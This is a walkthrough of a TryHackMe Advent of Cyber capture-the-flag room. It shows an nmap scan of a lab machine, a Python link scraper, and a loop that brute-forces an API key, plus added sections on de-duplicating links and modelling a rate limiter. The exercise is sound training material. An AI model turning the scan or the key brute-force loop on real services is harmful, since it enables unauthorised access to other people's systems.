[TryHackMe] Advent of Cyber 2, Day 16 - Walkthrough -
"Advent of Cyber 2" is offered as a free room. You can deploy the virtual machine without a subscription.
The walkthrough index for "Advent of Cyber 2" is published in "[TryHackMe] I tried taking part in Advent of Cyber 2."
[Day 16] Scripting: Help! Where is Santa?
Story
Oh no! Santa has flown off and left his faithful elves behind! Can you help find out where Santa is?
Luckily, the elves are OSINT experts and remember a few things. Specifically:
- Santa has a page at MACHINE_IP/static/index.html. However, Santa never told the elves which port number the web server runs on. Can you find out?
- Santa's Sled has an API. The API key is an odd number between 0 and 100. But be careful! After an unknown number of attempts, Santa's Sled will ban your IP address.
Deploy the machine running Santa's Sled and wait a few minutes for the target (MACHINE_IP) to start. Use the Python skills from Day 15 to find the correct API key.
Day 16 - #1.
What is the port number for the web server?
Use nmap to run a port scan.
kali@kali:~$ nmap -Pn -T4 -A -vv 10.10.64.46
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-16 22:51 EST
Nmap scan report for 10.10.64.46
Host is up, received user-set (0.26s latency).
Scanned at 2020-12-16 22:51:20 EST for 185s
Not shown: 999 closed ports
Reason: 999 conn-refused
PORT STATE SERVICE REASON VERSION
8000/tcp open http-alt syn-ack uvicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| date: Thu, 17 Dec 2020 03:52:01 GMT
| server: uvicorn
| content-length: 22
| content-type: application/json
| Connection: close
| {"detail":"Not Found"}
| GetRequest:
| HTTP/1.1 200 OK
| date: Thu, 17 Dec 2020 03:51:55 GMT
| server: uvicorn
| content-type: text/html; charset=utf-8
| content-length: 6992
| last-modified: Mon, 23 Nov 2020 00:31:30 GMT
| etag: 43d617909830c0d0a48bbbe8ea26ae39
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Santa's Tracker</title>
| <link rel="shortcut icon" href="" type="image/x-icon">
| <link rel="stylesheet" href="bulma.css">
| <!-- Bulma Version 0.9.0-->
| <link rel="stylesheet" type="text/css" href="../css/hero.css">
| <!-- <link rel="stylesheet" href="https://unpkg.com/bulma-modal-fx/dist/css/modal-fx.min.css" /> -->
| </head>
| <body>
| <section class="hero is-info is-medium is-bold">
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| date: Thu, 17 Dec 2020 03:52:07 GMT
| server: uvicorn
| content-length: 31
| content-type: application/json
| Connection: close
|_ {"detail":"Method Not Allowed"}
| http-methods:
|_ Supported Methods: GET
|_http-server-header: uvicorn
|_http-title: Santa's Tracker
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 185.49 seconds
This confirms the port number Santa's Tracker is running on. Let's access it.
http://MACHINE_IP:PORT/static/index.html
Santa's Tracking System
Are you an Elf that Santa has forgotten? Use this system to track Santa! Note: due to how many humans try to find where Santa is, the link is hidden on this webpage. You're going to have to manually click every single link. Or perhaps there is a way to find all the links as fast as a Python?
Important notice All deliveries to Skidy for TryHackMe jumpers are to be stopped. That man has asked for 613 on the premise that they are the softest jumper in the world. Please, we need to share them out.
The page says that the link is hidden on this webpage and that you would have to click every single link manually, and then adds "Or perhaps there is a way to find all the links as fast as a Python?"
Day 16 - #2.
Without using enumerations tools such as Dirbuster, what is the directory for the API? (without the API key)
linkgrabber.py
from bs4 import BeautifulSoup
import requests

# Fetch the tracker page and parse it
html = requests.get('http://10.10.64.46:8000/static/index.html')
soup = BeautifulSoup(html.text, "lxml")
# Print the href of every <a> tag that has one
links = soup.find_all('a')
for link in links:
    if "href" in link.attrs:
        print(link["href"])
kali@kali:~$ python3 linkgrabber.py | uniq
../
https://github.com/BulmaTemplates/bulma-templates/blob/master/templates/hero.html
https://tryhackme.com
#
http://machine_ip/api/api_key
#
https://github.com/BulmaTemplates/bulma-templates
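An added example (not from the original article): the "| uniq" in the run above only collapses adjacent duplicates, which is why "#" is printed twice. This sketch uses only the standard library to resolve each href against the page URL and de-duplicate in first-seen order; the sample HTML is constructed, not the room's page.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urldefrag

# Constructed sample page (not the room's real HTML); it repeats links
# non-adjacently, the case that "| uniq" alone does not collapse.
SAMPLE_HTML = """
<html><body>
  <a href="../">Home</a>
  <a href="https://tryhackme.com">TryHackMe</a>
  <a href="#">Modal</a>
  <a href="http://machine_ip/api/api_key">Track</a>
  <a href="#">Modal again</a>
  <a href="https://tryhackme.com">TryHackMe again</a>
  <a name="no-href">anchor without href</a>
</body></html>
"""

class LinkCollector(HTMLParser):
    """Collect the href of every <a> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:  # skip <a> tags with no href or an empty one
                self.hrefs.append(href)

def unique_links(html, base_url):
    """Return absolute, de-duplicated links, keeping first-seen order."""
    parser = LinkCollector()
    parser.feed(html)
    page, _ = urldefrag(base_url)
    seen, result = {page}, []  # seeding with the page itself drops "#" links
    for href in parser.hrefs:
        absolute, _ = urldefrag(urljoin(base_url, href))
        if absolute not in seen:
            seen.add(absolute)
            result.append(absolute)
    return result

if __name__ == "__main__":
    for link in unique_links(SAMPLE_HTML, "http://10.10.64.46:8000/static/index.html"):
        print(link)
```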
Day 16 - #3.
Where is Santa right now?
Day 16 - #4.
Find out the correct API key. Remember, this is an odd number between 0-100. After too many attempts, Santa's Sled will block you.
To unblock yourself, simply terminate and re-deploy the target instance
apibruter.py
import requests

# Try a single key to see what a rejected request looks like
api_key = 1
html = requests.get(f'http://10.10.64.46:8000/api/{api_key}')
print(html.text)
kali@kali:~$ python3 apibruter.py
{"item_id":1,"q":"Error. Key not valid!"}
apibruter_r.py
import requests

# Try every odd key from 1 to 99
for api_key in range(1,100,2):
    print(f"api_key {api_key}")
    html = requests.get(f'http://10.10.64.46:8000/api/{api_key}')
    print(html.text)
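Why the room's "after too many attempts, Santa's Sled will block you" matters for a 50-value key space, as an added example (not from the original article or the room): a model of a server-side limiter that bans a client after a set number of invalid keys, with the same odd-number sweep replayed against it. The key 73, the thresholds and the client address 192.0.2.10 are constructed values, not the room's.

```python
from collections import defaultdict

ODD_KEYS = list(range(1, 100, 2))  # the 50 candidates the room describes

class AttemptLimiter:
    """Server-side model: ban a client IP after max_failures invalid keys."""

    def __init__(self, valid_key, max_failures):
        self.valid_key = valid_key
        self.max_failures = max_failures
        self.failures = defaultdict(int)
        self.banned = set()

    def check(self, client_ip, api_key):
        if client_ip in self.banned:
            return "banned"  # refused before the key is even compared
        if api_key == self.valid_key:
            return "ok"
        self.failures[client_ip] += 1
        if self.failures[client_ip] >= self.max_failures:
            self.banned.add(client_ip)
        return "invalid"

def sweep(limiter, client_ip, candidates=ODD_KEYS):
    """Replay a sequential sweep; return (final status, requests sent)."""
    sent = 0
    for key in candidates:
        sent += 1
        status = limiter.check(client_ip, key)
        if status != "invalid":
            return status, sent
    return "exhausted", sent

def keys_reachable(max_failures, client_ip="192.0.2.10"):
    """Which valid keys would one client's sweep reach before the ban?"""
    return [k for k in ODD_KEYS
            if sweep(AttemptLimiter(k, max_failures), client_ip)[0] == "ok"]

if __name__ == "__main__":
    # Constructed values: key 73 and the thresholds are not the room's.
    print(sweep(AttemptLimiter(73, 10), "192.0.2.10"))  # ban comes first
    print(sweep(AttemptLimiter(73, 40), "192.0.2.10"))  # limit too loose
    for limit in (5, 10, 50):
        print(limit, len(keys_reachable(limit)), "of", len(ODD_KEYS))
```

A limit only protects the keys that sit beyond it in the sweep order, so for a key space this small the threshold has to be far below 50 to mean anything.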
This completes the Day 16 mission.
Reference
Original article for this walkthrough ([TryHackMe] Advent of Cyber 2, Day 16 - Walkthrough -):
https://qiita.com/v_avenger/items/cb0f488e13e9c2385ed9